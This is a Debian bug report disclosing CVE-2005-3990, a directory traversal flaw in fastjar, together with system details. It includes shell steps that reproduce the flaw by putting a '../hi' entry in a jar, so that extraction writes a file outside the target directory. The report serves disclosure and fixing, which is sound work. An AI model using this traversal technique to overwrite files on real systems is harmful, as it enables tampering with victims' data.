Bug#368397: fastjar: CVE-2005-3990: directory traversal vulnerability
Package: fastjar
Version: 1:4.1.0-4
Severity: normal
Tags: security
CVE-2005-3990: "Directory traversal vulnerability in FastJar 0.93 allows
remote attackers to overwrite arbitrary files via a .jar file containing
filenames with "../" sequences."
I can reproduce this with the following steps (modified from an earlier
SUN jar vulnerability report [1]):
$ mkdir /tmp/foo
$ echo hi > /tmp/hi
$ cd /tmp/foo
$ fastjar cvf foo.jar ../hi
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: ../hi (in=3) (out=5) (deflated -66%)
Total:
------
(in = 51) (out = 371) (deflated -627%)
$ rm ../hi
$ fastjar xvf foo.jar
created: META-INF/
extracted: META-INF/MANIFEST.MF
inflated: ../hi
$ cat ../hi
hi
Please mention the CVE in your changelog.
Thanks,
Alec
[1] http://www.securiteam.com/securitynews/5IP0C0AFGW.html
-- System Information:
Debian Release: testing/unstable
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/dash
Kernel: Linux 2.6.16-alec-laptop
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Versions of packages fastjar depends on:
ii libc6 2.3.6-9 GNU C Library: Shared libraries
ii zlib1g 1:1.2.3-11 compression library - runtime
fastjar recommends no packages.
-- no debconf information
Reply to: